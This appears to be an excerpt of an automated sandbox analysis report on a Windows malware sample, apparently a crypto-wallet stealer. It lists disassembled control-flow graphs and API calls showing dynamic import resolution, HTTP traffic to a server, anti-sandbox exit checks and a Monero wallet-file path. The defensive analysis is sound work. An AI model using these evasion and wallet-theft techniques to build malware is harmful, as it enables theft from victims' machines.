                                      • Instruction ID: ec14491661c14bd124c2e4f568dbf6af4fb4783b4d64c46f7fe7c7ba5451e195
                                      • Opcode Fuzzy Hash: d9b65a7abf220b3ac733655eaaf4e14a320b85c625c2e45a5530a0f348c81e29
                                      • Instruction Fuzzy Hash: 89D09E74D0430C9BCB04DFE199496DDBB78FB0C615F101559E909A6380EA316455CA76

                                      Control-flow Graph
                                      control_flow_graph 633 a49f20-a49f2a 634 a4a346-a4a3da LoadLibraryA * 8 633->634 635 a49f30-a4a341 GetProcAddress * 43 633->635 636 a4a456-a4a45d 634->636 637 a4a3dc-a4a451 GetProcAddress * 5 634->637 635->634 638 a4a526-a4a52d 636->638 639 a4a463-a4a521 GetProcAddress * 8 636->639 637->636 640 a4a52f-a4a5a3 GetProcAddress * 5 638->640 641 a4a5a8-a4a5af 638->641 639->638 640->641 642 a4a5b5-a4a642 GetProcAddress * 6 641->642 643 a4a647-a4a64e 641->643 642->643 644 a4a654-a4a72a GetProcAddress * 9 643->644 645 a4a72f-a4a736 643->645 644->645 646 a4a7b2-a4a7b9 645->646 647 a4a738-a4a7ad GetProcAddress * 5 645->647 648 a4a7ec-a4a7f3 646->648 649 a4a7bb-a4a7e7 GetProcAddress * 2 646->649 647->646 650 a4a825-a4a82c 648->650 651 a4a7f5-a4a820 GetProcAddress * 2 648->651 649->648 652 a4a922-a4a929 650->652 653 a4a832-a4a91d GetProcAddress * 10 650->653 651->650 654 a4a98d-a4a994 652->654 655 a4a92b-a4a988 GetProcAddress * 4 652->655 653->652 656 a4a996-a4a9a9 GetProcAddress 654->656 657 a4a9ae-a4a9b5 654->657 655->654 656->657 658 a4a9b7-a4aa13 GetProcAddress * 4 657->658 659 a4aa18-a4aa19 657->659 658->659
                                      APIs
                                      • GetProcAddress.KERNEL32(77190000,013055C8), ref: 00A49F3D
                                      • GetProcAddress.KERNEL32(77190000,01305528), ref: 00A49F55
                                      • GetProcAddress.KERNEL32(77190000,01319008), ref: 00A49F6E
                                      • GetProcAddress.KERNEL32(77190000,01319080), ref: 00A49F86
                                      • GetProcAddress.KERNEL32(77190000,01319020), ref: 00A49F9E
                                      • GetProcAddress.KERNEL32(77190000,0131D7D0), ref: 00A49FB7
                                      • GetProcAddress.KERNEL32(77190000,0130A640), ref: 00A49FCF
                                      • GetProcAddress.KERNEL32(77190000,0131D770), ref: 00A49FE7
                                      • GetProcAddress.KERNEL32(77190000,0131D740), ref: 00A4A000
                                      • GetProcAddress.KERNEL32(77190000,0131D6B0), ref: 00A4A018
                                      • GetProcAddress.KERNEL32(77190000,0131D710), ref: 00A4A030
                                      • GetProcAddress.KERNEL32(77190000,013055E8), ref: 00A4A049
                                      • GetProcAddress.KERNEL32(77190000,01305628), ref: 00A4A061
                                      • GetProcAddress.KERNEL32(77190000,01305408), ref: 00A4A079
                                      • GetProcAddress.KERNEL32(77190000,01305548), ref: 00A4A092
                                      • GetProcAddress.KERNEL32(77190000,0131D7E8), ref: 00A4A0AA
                                      • GetProcAddress.KERNEL32(77190000,0131D698), ref: 00A4A0C2
                                      • GetProcAddress.KERNEL32(77190000,0130A668), ref: 00A4A0DB
                                      • GetProcAddress.KERNEL32(77190000,01305588), ref: 00A4A0F3
                                      • GetProcAddress.KERNEL32(77190000,0131D728), ref: 00A4A10B
                                      • GetProcAddress.KERNEL32(77190000,0131D638), ref: 00A4A124
                                      • GetProcAddress.KERNEL32(77190000,0131D668), ref: 00A4A13C
                                      • GetProcAddress.KERNEL32(77190000,0131D758), ref: 00A4A154
                                      • GetProcAddress.KERNEL32(77190000,013055A8), ref: 00A4A16D
                                      • GetProcAddress.KERNEL32(77190000,0131D788), ref: 00A4A185
                                      • GetProcAddress.KERNEL32(77190000,0131D7A0), ref: 00A4A19D
                                      • GetProcAddress.KERNEL32(77190000,0131D6F8), ref: 00A4A1B6
                                      • GetProcAddress.KERNEL32(77190000,0131D680), ref: 00A4A1CE
                                      • GetProcAddress.KERNEL32(77190000,0131D7B8), ref: 00A4A1E6
                                      • GetProcAddress.KERNEL32(77190000,0131D650), ref: 00A4A1FF
                                      • GetProcAddress.KERNEL32(77190000,0131D6E0), ref: 00A4A217
                                      • GetProcAddress.KERNEL32(77190000,0131D6C8), ref: 00A4A22F
                                      • GetProcAddress.KERNEL32(77190000,0131D230), ref: 00A4A248
                                      • GetProcAddress.KERNEL32(77190000,0130FBC8), ref: 00A4A260
                                      • GetProcAddress.KERNEL32(77190000,0131D2A8), ref: 00A4A278
                                      • GetProcAddress.KERNEL32(77190000,0131D0C8), ref: 00A4A291
                                      • GetProcAddress.KERNEL32(77190000,01305708), ref: 00A4A2A9
                                      • GetProcAddress.KERNEL32(77190000,0131D140), ref: 00A4A2C1
                                      • GetProcAddress.KERNEL32(77190000,01305388), ref: 00A4A2DA
                                      • GetProcAddress.KERNEL32(77190000,0131D2C0), ref: 00A4A2F2
                                      • GetProcAddress.KERNEL32(77190000,0131D188), ref: 00A4A30A
                                      • GetProcAddress.KERNEL32(77190000,01305668), ref: 00A4A323
                                      • GetProcAddress.KERNEL32(77190000,013056A8), ref: 00A4A33B
                                      • LoadLibraryA.KERNEL32(0131D068,?,00A45EF3,00A50AEB,?,?,?,?,?,?,?,?,?,?,00A50AEA,00A50AE7), ref: 00A4A34D
                                      • LoadLibraryA.KERNEL32(0131D320,?,00A45EF3,00A50AEB,?,?,?,?,?,?,?,?,?,?,00A50AEA,00A50AE7), ref: 00A4A35E
                                      • LoadLibraryA.KERNEL32(0131D0E0,?,00A45EF3,00A50AEB,?,?,?,?,?,?,?,?,?,?,00A50AEA,00A50AE7), ref: 00A4A370
                                      • LoadLibraryA.KERNEL32(0131D0F8,?,00A45EF3,00A50AEB,?,?,?,?,?,?,?,?,?,?,00A50AEA,00A50AE7), ref: 00A4A382
                                      • LoadLibraryA.KERNEL32(0131D248,?,00A45EF3,00A50AEB,?,?,?,?,?,?,?,?,?,?,00A50AEA,00A50AE7), ref: 00A4A393
                                      • LoadLibraryA.KERNEL32(0131D2F0,?,00A45EF3,00A50AEB,?,?,?,?,?,?,?,?,?,?,00A50AEA,00A50AE7), ref: 00A4A3A5
                                      • LoadLibraryA.KERNEL32(0131D110,?,00A45EF3,00A50AEB,?,?,?,?,?,?,?,?,?,?,00A50AEA,00A50AE7), ref: 00A4A3B7
                                      • LoadLibraryA.KERNEL32(0131D128,?,00A45EF3,00A50AEB,?,?,?,?,?,?,?,?,?,?,00A50AEA,00A50AE7), ref: 00A4A3C8
                                      • GetProcAddress.KERNEL32(77040000,01305268), ref: 00A4A3EA
                                      • GetProcAddress.KERNEL32(77040000,0131D158), ref: 00A4A402
                                      • GetProcAddress.KERNEL32(77040000,01318BD8), ref: 00A4A41A
                                      • GetProcAddress.KERNEL32(77040000,0131D038), ref: 00A4A433
                                      • GetProcAddress.KERNEL32(77040000,01305308), ref: 00A4A44B
                                      • GetProcAddress.KERNEL32(73D20000,0130A988), ref: 00A4A470
                                      • GetProcAddress.KERNEL32(73D20000,01304F88), ref: 00A4A489
                                      • GetProcAddress.KERNEL32(73D20000,0130A7A8), ref: 00A4A4A1
                                      • GetProcAddress.KERNEL32(73D20000,0131D098), ref: 00A4A4B9
                                      • GetProcAddress.KERNEL32(73D20000,0131D170), ref: 00A4A4D2
                                      • GetProcAddress.KERNEL32(73D20000,01305228), ref: 00A4A4EA
                                      • GetProcAddress.KERNEL32(73D20000,013052C8), ref: 00A4A502
                                      • GetProcAddress.KERNEL32(73D20000,0131D260), ref: 00A4A51B
                                      • GetProcAddress.KERNEL32(768D0000,01305188), ref: 00A4A53C
                                      • GetProcAddress.KERNEL32(768D0000,01304FE8), ref: 00A4A554
                                      • GetProcAddress.KERNEL32(768D0000,0131D050), ref: 00A4A56D
                                      • GetProcAddress.KERNEL32(768D0000,0131D1A0), ref: 00A4A585
                                      • GetProcAddress.KERNEL32(768D0000,01305208), ref: 00A4A59D
                                      • GetProcAddress.KERNEL32(75790000,0130A848), ref: 00A4A5C3
                                      • GetProcAddress.KERNEL32(75790000,0130A528), ref: 00A4A5DB
                                      • GetProcAddress.KERNEL32(75790000,0131D290), ref: 00A4A5F3
                                      • GetProcAddress.KERNEL32(75790000,01305248), ref: 00A4A60C
                                      • GetProcAddress.KERNEL32(75790000,01305328), ref: 00A4A624
                                      • GetProcAddress.KERNEL32(75790000,0130A7F8), ref: 00A4A63C
                                      • GetProcAddress.KERNEL32(75A10000,0131D200), ref: 00A4A662
                                      • GetProcAddress.KERNEL32(75A10000,01305288), ref: 00A4A67A
                                      • GetProcAddress.KERNEL32(75A10000,01318BE8), ref: 00A4A692
                                      • GetProcAddress.KERNEL32(75A10000,0131D2D8), ref: 00A4A6AB
                                      • GetProcAddress.KERNEL32(75A10000,0131D1B8), ref: 00A4A6C3
                                      • GetProcAddress.KERNEL32(75A10000,01304FA8), ref: 00A4A6DB
                                      • GetProcAddress.KERNEL32(75A10000,01305148), ref: 00A4A6F4
                                      • GetProcAddress.KERNEL32(75A10000,0131D1D0), ref: 00A4A70C
                                      • GetProcAddress.KERNEL32(75A10000,0131D308), ref: 00A4A724
                                      • GetProcAddress.KERNEL32(76850000,013051E8), ref: 00A4A746
                                      • GetProcAddress.KERNEL32(76850000,0131D080), ref: 00A4A75E
                                      • GetProcAddress.KERNEL32(76850000,0131D1E8), ref: 00A4A776
                                      • GetProcAddress.KERNEL32(76850000,0131D218), ref: 00A4A78F
                                      • GetProcAddress.KERNEL32(76850000,0131D278), ref: 00A4A7A7
                                      • GetProcAddress.KERNEL32(75690000,01305348), ref: 00A4A7C8
                                      • GetProcAddress.KERNEL32(75690000,01305108), ref: 00A4A7E1
                                      • GetProcAddress.KERNEL32(769C0000,01305048), ref: 00A4A802
                                      • GetProcAddress.KERNEL32(769C0000,0131D0B0), ref: 00A4A81A
                                      • GetProcAddress.KERNEL32(6F8C0000,01305128), ref: 00A4A840
                                      • GetProcAddress.KERNEL32(6F8C0000,013050E8), ref: 00A4A858
                                      • GetProcAddress.KERNEL32(6F8C0000,013050A8), ref: 00A4A870
                                      • GetProcAddress.KERNEL32(6F8C0000,0131D5C0), ref: 00A4A889
                                      • GetProcAddress.KERNEL32(6F8C0000,013052A8), ref: 00A4A8A1
                                      • GetProcAddress.KERNEL32(6F8C0000,01305368), ref: 00A4A8B9
                                      • GetProcAddress.KERNEL32(6F8C0000,01305168), ref: 00A4A8D2
                                      • GetProcAddress.KERNEL32(6F8C0000,01305088), ref: 00A4A8EA
                                      • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00A4A901
                                      • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00A4A917
                                      • GetProcAddress.KERNEL32(75D90000,0131D3E0), ref: 00A4A939
                                      • GetProcAddress.KERNEL32(75D90000,01318B28), ref: 00A4A951
                                      • GetProcAddress.KERNEL32(75D90000,0131D458), ref: 00A4A969
                                      • GetProcAddress.KERNEL32(75D90000,0131D410), ref: 00A4A982
                                      • GetProcAddress.KERNEL32(76470000,013052E8), ref: 00A4A9A3
                                      • GetProcAddress.KERNEL32(6D900000,0131D3F8), ref: 00A4A9C4
                                      • GetProcAddress.KERNEL32(6D900000,013050C8), ref: 00A4A9DD
                                      • GetProcAddress.KERNEL32(6D900000,0131D3B0), ref: 00A4A9F5
                                      • GetProcAddress.KERNEL32(6D900000,0131D3C8), ref: 00A4AA0D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: HttpQueryInfoA$InternetSetOptionA
                                      • API String ID: 2238633743-1775429166
                                      • Opcode ID: 0093b75f8454b972d5635701ac50ce77f0d7906ecb7cc6d3a2382f5927c10e01
                                      • Instruction ID: dc24a3bd8b56899a2fed25439bcffa045e89e11d1ff4e483c23f728376d83026
                                      • Opcode Fuzzy Hash: 0093b75f8454b972d5635701ac50ce77f0d7906ecb7cc6d3a2382f5927c10e01
                                      • Instruction Fuzzy Hash: 25621BB5A183009FC344DFA8EC88B567BB9A78D701710961ABA0DCB3B0D735B951CBB5

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 801 a348d0-a34992 call a4aab0 call a34800 call a4aa50 * 5 InternetOpenA StrCmpCA 816 a34994 801->816 817 a3499b-a3499f 801->817 816->817 818 a349a5-a34b1d call a48cf0 call a4ac30 call a4abb0 call a4ab10 * 2 call a4acc0 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4ac30 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4acc0 call a4ac30 call a4abb0 call a4ab10 * 2 InternetConnectA 817->818 819 a34f1b-a34f43 InternetCloseHandle call a4ade0 call a3a210 817->819 818->819 905 a34b23-a34b27 818->905 829 a34f82-a34ff2 call a48b20 * 2 call a4aab0 call a4ab10 * 8 819->829 830 a34f45-a34f7d call a4ab30 call a4acc0 call a4abb0 call a4ab10 819->830 830->829 906 a34b35 905->906 907 a34b29-a34b33 905->907 908 a34b3f-a34b72 HttpOpenRequestA 906->908 907->908 909 a34b78-a34e78 call a4acc0 call a4abb0 call a4ab10 call a4ac30 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4ac30 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4ac30 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4ac30 call a4abb0 call a4ab10 call a4aa50 call a4ac30 * 2 call a4abb0 call a4ab10 * 2 call a4ade0 lstrlen call a4ade0 * 2 lstrlen call a4ade0 HttpSendRequestA 908->909 910 a34f0e-a34f15 InternetCloseHandle 908->910 1021 a34e82-a34eac InternetReadFile 909->1021 910->819 1022 a34eb7-a34f09 InternetCloseHandle call a4ab10 1021->1022 1023 a34eae-a34eb5 1021->1023 1022->910 1023->1022 1024 a34eb9-a34ef7 call a4acc0 call a4abb0 call a4ab10 1023->1024 1024->1021
                                      APIs
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                        • Part of subcall function 00A34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A34889
                                        • Part of subcall function 00A34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A34899
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00A34965
                                      • StrCmpCA.SHLWAPI(?,0131F410), ref: 00A3498A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A34B0A
                                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00A50DDE,00000000,?,?,00000000,?,",00000000,?,0131F420), ref: 00A34E38
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00A34E54
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00A34E68
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00A34E99
                                      • InternetCloseHandle.WININET(00000000), ref: 00A34EFD
                                      • InternetCloseHandle.WININET(00000000), ref: 00A34F15
                                      • HttpOpenRequestA.WININET(00000000,0131F4E0,?,0131EE20,00000000,00000000,00400100,00000000), ref: 00A34B65
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                      • InternetCloseHandle.WININET(00000000), ref: 00A34F1F
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 460715078-2180234286
                                      • Opcode ID: baa4785f2f74ada29cf9749d829a437faaaeaab875f8a148fb4ca1e8ec7e2070
                                      • Instruction ID: 712c620b3f7abada61c171ec8a7c35a87f81a165bde2d0f5fb2ba133657ae4ed
                                      • Opcode Fuzzy Hash: baa4785f2f74ada29cf9749d829a437faaaeaab875f8a148fb4ca1e8ec7e2070
                                      • Instruction Fuzzy Hash: D8122E76950618ABDB15EB90DEA2FEEB339BFA4300F104599F10662491DF306F49CF62

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1090 a45760-a457c7 call a45d20 call a4ab30 * 3 call a4aa50 * 4 1106 a457cc-a457d3 1090->1106 1107 a457d5-a45806 call a4ab30 call a4aab0 call a31590 call a45440 1106->1107 1108 a45827-a4589c call a4aa50 * 2 call a31590 call a45510 call a4abb0 call a4ab10 call a4ade0 StrCmpCA 1106->1108 1123 a4580b-a45822 call a4abb0 call a4ab10 1107->1123 1134 a458e3-a458f9 call a4ade0 StrCmpCA 1108->1134 1138 a4589e-a458de call a4aab0 call a31590 call a45440 call a4abb0 call a4ab10 1108->1138 1123->1134 1139 a45a2c-a45a94 call a4abb0 call a4ab30 * 2 call a316b0 call a4ab10 * 4 call a31670 call a31550 1134->1139 1140 a458ff-a45906 1134->1140 1138->1134 1269 a45d13-a45d16 1139->1269 1142 a4590c-a45913 1140->1142 1143 a45a2a-a45aaf call a4ade0 StrCmpCA 1140->1143 1146 a45915-a45969 call a4ab30 call a4aab0 call a31590 call a45440 call a4abb0 call a4ab10 1142->1146 1147 a4596e-a459e3 call a4aa50 * 2 call a31590 call a45510 call a4abb0 call a4ab10 call a4ade0 StrCmpCA 1142->1147 1162 a45ab5-a45abc 1143->1162 1163 a45be1-a45c49 call a4abb0 call a4ab30 * 2 call a316b0 call a4ab10 * 4 call a31670 call a31550 1143->1163 1146->1143 1147->1143 1246 a459e5-a45a25 call a4aab0 call a31590 call a45440 call a4abb0 call a4ab10 1147->1246 1168 a45ac2-a45ac9 1162->1168 1169 a45bdf-a45c64 call a4ade0 StrCmpCA 1162->1169 1163->1269 1175 a45b23-a45b98 call a4aa50 * 2 call a31590 call a45510 call a4abb0 call a4ab10 call a4ade0 StrCmpCA 1168->1175 1176 a45acb-a45b1e call a4ab30 call a4aab0 call a31590 call a45440 call a4abb0 call a4ab10 1168->1176 1198 a45c66-a45c71 Sleep 1169->1198 1199 a45c78-a45ce1 call a4abb0 call a4ab30 * 2 call a316b0 call a4ab10 * 4 call a31670 call a31550 1169->1199 1175->1169 1274 a45b9a-a45bda call a4aab0 call a31590 call a45440 call a4abb0 call a4ab10 1175->1274 1176->1169 1198->1106 1199->1269 1246->1143 1274->1169
                                      APIs
                                        • Part of subcall function 00A4AB30: lstrlen.KERNEL32(00A34F55,?,?,00A34F55,00A50DDF), ref: 00A4AB3B
                                        • Part of subcall function 00A4AB30: lstrcpy.KERNEL32(00A50DDF,00000000), ref: 00A4AB95
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A45894
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A458F1
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A45AA7
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                        • Part of subcall function 00A45440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A45478
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A45510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A45568
                                        • Part of subcall function 00A45510: lstrlen.KERNEL32(00000000), ref: 00A4557F
                                        • Part of subcall function 00A45510: StrStrA.SHLWAPI(00000000,00000000), ref: 00A455B4
                                        • Part of subcall function 00A45510: lstrlen.KERNEL32(00000000), ref: 00A455D3
                                        • Part of subcall function 00A45510: lstrlen.KERNEL32(00000000), ref: 00A455FE
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A459DB
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A45B90
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A45C5C
                                      • Sleep.KERNEL32(0000EA60), ref: 00A45C6B
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleep
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 507064821-2791005934
                                      • Opcode ID: 29af9622cfb765c3650cf8997bcb069ca4926dcb2669cf20d3030b4d9a8c732e
                                      • Instruction ID: bab34a3b9b641f6121865fda6babd8f4f9d4b041a5f0d9ebe2b117b6de2f4baa
                                      • Opcode Fuzzy Hash: 29af9622cfb765c3650cf8997bcb069ca4926dcb2669cf20d3030b4d9a8c732e
                                      • Instruction Fuzzy Hash: B4E14276D505049BDB14FBB0DEA2EED733DEFA4340F508568B50666192EF30AE09CB62

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1301 a419f0-a41a1d call a4ade0 StrCmpCA 1304 a41a27-a41a41 call a4ade0 1301->1304 1305 a41a1f-a41a21 ExitProcess 1301->1305 1309 a41a44-a41a48 1304->1309 1310 a41c12-a41c1d call a4ab10 1309->1310 1311 a41a4e-a41a61 1309->1311 1313 a41a67-a41a6a 1311->1313 1314 a41bee-a41c0d 1311->1314 1316 a41a85-a41a94 call a4ab30 1313->1316 1317 a41bc0-a41bd1 StrCmpCA 1313->1317 1318 a41b41-a41b52 StrCmpCA 1313->1318 1319 a41ba1-a41bb2 StrCmpCA 1313->1319 1320 a41b82-a41b93 StrCmpCA 1313->1320 1321 a41b63-a41b74 StrCmpCA 1313->1321 1322 a41aad-a41abe StrCmpCA 1313->1322 1323 a41acf-a41ae0 StrCmpCA 1313->1323 1324 a41a71-a41a80 call a4ab30 1313->1324 1325 a41afd-a41b0e StrCmpCA 1313->1325 1326 a41b1f-a41b30 StrCmpCA 1313->1326 1327 a41bdf-a41be9 call a4ab30 1313->1327 1328 a41a99-a41aa8 call a4ab30 1313->1328 1314->1309 1316->1314 1349 a41bd3-a41bd6 1317->1349 1350 a41bdd 1317->1350 1340 a41b54-a41b57 1318->1340 1341 a41b5e 1318->1341 1346 a41bb4-a41bb7 1319->1346 1347 a41bbe 1319->1347 1344 a41b95-a41b98 1320->1344 1345 a41b9f 1320->1345 1342 a41b76-a41b79 1321->1342 1343 a41b80 1321->1343 1332 a41ac0-a41ac3 1322->1332 1333 a41aca 1322->1333 1334 a41ae2-a41aec 1323->1334 1335 a41aee-a41af1 1323->1335 1324->1314 1336 a41b10-a41b13 1325->1336 1337 a41b1a 1325->1337 1338 a41b32-a41b35 1326->1338 1339 a41b3c 1326->1339 1327->1314 1328->1314 1332->1333 1333->1314 1353 a41af8 1334->1353 1335->1353 1336->1337 1337->1314 1338->1339 1339->1314 1340->1341 1341->1314 1342->1343 1343->1314 1344->1345 1345->1314 1346->1347 1347->1314 1349->1350 1350->1314 1353->1314
                                      APIs
                                      • StrCmpCA.SHLWAPI(00000000,block), ref: 00A41A15
                                      • ExitProcess.KERNEL32 ref: 00A41A21
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID: block
                                      • API String ID: 621844428-2199623458
                                      • Opcode ID: 15f973705adeb9290eb525332e5fd936d4ebf1287ed5dd52be4498cc9f4e3497
                                      • Instruction ID: d54165e35cbc59f0620d17a713b8c7946f414aa6697751da41ed51b2553b013a
                                      • Opcode Fuzzy Hash: 15f973705adeb9290eb525332e5fd936d4ebf1287ed5dd52be4498cc9f4e3497
                                      • Instruction Fuzzy Hash: 97514A79B08209EFDB44DFA4DA44FAE77B9FF84704F104458E806AB240E770E986CB61

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,013117C8), ref: 00A49BF1
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,013116A8), ref: 00A49C0A
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,01311768), ref: 00A49C22
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,013116C0), ref: 00A49C3A
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,01311750), ref: 00A49C53
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,01318B08), ref: 00A49C6B
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,013056C8), ref: 00A49C83
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,013054C8), ref: 00A49C9C
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,013117B0), ref: 00A49CB4
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,013114F8), ref: 00A49CCC
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,013116D8), ref: 00A49CE5
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,01311708), ref: 00A49CFD
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,01305568), ref: 00A49D15
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,01311588), ref: 00A49D2E
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A311D0: ExitProcess.KERNEL32 ref: 00A31211
                                        • Part of subcall function 00A31160: GetSystemInfo.KERNEL32(?), ref: 00A3116A
                                        • Part of subcall function 00A31160: ExitProcess.KERNEL32 ref: 00A3117E
                                        • Part of subcall function 00A31110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00A3112B
                                        • Part of subcall function 00A31110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00A31132
                                        • Part of subcall function 00A31110: ExitProcess.KERNEL32 ref: 00A31143
                                        • Part of subcall function 00A31220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00A3123E
                                        • Part of subcall function 00A31220: __aulldiv.LIBCMT ref: 00A31258
                                        • Part of subcall function 00A31220: __aulldiv.LIBCMT ref: 00A31266
                                        • Part of subcall function 00A31220: ExitProcess.KERNEL32 ref: 00A31294
                                        • Part of subcall function 00A46A10: GetUserDefaultLangID.KERNEL32 ref: 00A46A14
                                        • Part of subcall function 00A31190: ExitProcess.KERNEL32 ref: 00A311C6
                                        • Part of subcall function 00A479E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A311B7), ref: 00A47A10
                                        • Part of subcall function 00A479E0: RtlAllocateHeap.NTDLL(00000000), ref: 00A47A17
                                        • Part of subcall function 00A479E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A47A2F
                                        • Part of subcall function 00A47A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A47AA0
                                        • Part of subcall function 00A47A70: RtlAllocateHeap.NTDLL(00000000), ref: 00A47AA7
                                        • Part of subcall function 00A47A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00A47ABF
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
